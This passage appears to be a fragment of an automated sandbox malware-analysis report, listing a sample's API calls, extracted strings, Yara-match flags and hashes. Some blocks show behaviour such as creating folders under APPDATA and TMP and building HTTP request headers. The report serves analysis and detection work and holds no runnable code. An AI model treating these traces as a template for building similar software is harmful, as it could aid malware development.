                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                                        • _free.LIBCMT ref: 1000A03A
                                                          • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                          • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                        • _free.LIBCMT ref: 1000A05C
                                                        • _free.LIBCMT ref: 1000A071
                                                        • _free.LIBCMT ref: 1000A07C
                                                        • _free.LIBCMT ref: 1000A09E
                                                        • _free.LIBCMT ref: 1000A0B1
                                                        • _free.LIBCMT ref: 1000A0BF
                                                        • _free.LIBCMT ref: 1000A0CA
                                                        • _free.LIBCMT ref: 1000A102
                                                        • _free.LIBCMT ref: 1000A109
                                                        • _free.LIBCMT ref: 1000A126
                                                        • _free.LIBCMT ref: 1000A13E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                        • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                                        • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                        • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                        • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                        • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                        • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                        • String ID: APPDATA$TMPDIR
                                                        • API String ID: 1838500112-4048745339
                                                        • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                        • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                        • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                        • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                        • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                        • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                        • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                        • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                        Strings
                                                        • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                        • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                        • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                        • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: HeadersHttpRequest$H_prolog3_
                                                        • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                        • API String ID: 1254599795-787135837
                                                        • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                        • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                        • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                        • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                        • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                                        • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                        • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                                        APIs
                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DecodePointer
                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                        • API String ID: 3527080286-3064271455
                                                        • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                                                        • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                                                        • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                                                        • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                                                        APIs
                                                        • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                        • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                        • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                        • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 2751267872-393685449
                                                        • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                        • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                        • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                        • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                        APIs
                                                        • type_info::operator==.LIBVCRUNTIME ref: 0493C081
                                                        • ___TypeMatch.LIBVCRUNTIME ref: 0493C18F
                                                        • _UnwindNestedFrames.LIBCMT ref: 0493C2E1
                                                        • CallUnexpected.LIBVCRUNTIME ref: 0493C2FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 2751267872-393685449
                                                        • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                        • Instruction ID: 2915e5f6b3d89eb84cad3e1e9624f9003781cc35021f82a78c33243d2f8adaa9
                                                        • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                        • Instruction Fuzzy Hash: 98B14972800A19EFDF25DFA4C8809AEB7B9BF46316F14416AE8217B211D731FA51CF91
                                                        APIs
                                                        • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                                                        • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                                                        • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                                                        • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 2751267872-393685449
                                                        • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                        • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                                                        • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                        • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: _free$___from_strstr_to_strchr
                                                        • String ID:
                                                        • API String ID: 3409252457-0
                                                        • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                        • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                                        • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                        • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04939E22), ref: 04939E50
                                                        • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04939E22), ref: 04939E5B
                                                        • GetModuleHandleW.KERNEL32(0042000C,?,?,04939E22), ref: 04939E6C
                                                        • GetProcAddress.KERNEL32(00000000,00420028), ref: 04939E7E
                                                        • GetProcAddress.KERNEL32(00000000,00420044), ref: 04939E8C
                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04939E22), ref: 04939EAF
                                                        • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04939ECB
                                                        • CloseHandle.KERNEL32(0042D060,?,?,04939E22), ref: 04939EDB
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                        • String ID:
                                                        • API String ID: 2565136772-0
                                                        • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                        • Instruction ID: 673de6ed67965b3f6fbc6023462f0e4166f1d5e35f12aa292d970a48319607c6
                                                        • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                        • Instruction Fuzzy Hash: 1601B571F40711ABE7305BB0BC0CF9B3AECAB49706B504035F905E2161DBB4C8078A69
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strrchr
                                                        • String ID:
                                                        • API String ID: 3213747228-0
                                                        • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                                                        • Instruction ID: ccd5107143c2c6934b99a2b8ecf7bf1f06a3cf5aece5524f4521e8c908ad63e9
                                                        • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                                                        • Instruction Fuzzy Hash: BDB16972A00366AFEB11CF64CC81FAE7BA9EFD9714F144275E804AF281D274B901C7A1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strrchr
                                                        • String ID:
                                                        • API String ID: 3213747228-0
                                                        • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                                                        • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                                                        • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                                                        • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                                                        APIs
                                                        • __RTC_Initialize.LIBCMT ref: 1000291D
                                                        • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: Initialize___scrt_uninitialize_crt
                                                        • String ID:
                                                        • API String ID: 2442719207-0
                                                        • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                        • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                        • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                        • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                        • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                        • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 1170836740-1018135373
                                                        • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                        • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                        • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                        • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 0040B837
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                                                        • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                                                        • _ValidateLocalCookies.LIBCMT ref: 0040B948
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 1170836740-1018135373
                                                        • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                        • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                                                        • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                        • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 0-537541572
                                                        • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                        • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                        • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                        • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                        APIs
                                                        • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3664257935-537541572
                                                        • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                        • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                                                        • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                        • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                                                        APIs
                                                          • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                                        • _free.LIBCMT ref: 1000C60D
                                                          • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                          • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                        • _free.LIBCMT ref: 1000C618
                                                        • _free.LIBCMT ref: 1000C623
                                                        • _free.LIBCMT ref: 1000C677
                                                        • _free.LIBCMT ref: 1000C682
                                                        • _free.LIBCMT ref: 1000C68D
                                                        • _free.LIBCMT ref: 1000C698
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                        • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                                        • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                        • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                        • __fassign.LIBCMT ref: 1000B905
                                                        • __fassign.LIBCMT ref: 1000B922
                                                        • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 1735259414-0
                                                        • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                        • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                        • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                        • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                        APIs
                                                        • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                        • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                        • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                        • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                        • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,0493BC22,0493B1C6,0493A9D7), ref: 0493BC39
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0493BC47
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0493BC60
                                                        • SetLastError.KERNEL32(00000000,0493BC22,0493B1C6,0493A9D7), ref: 0493BCB2
                                                        Memory Dump Source
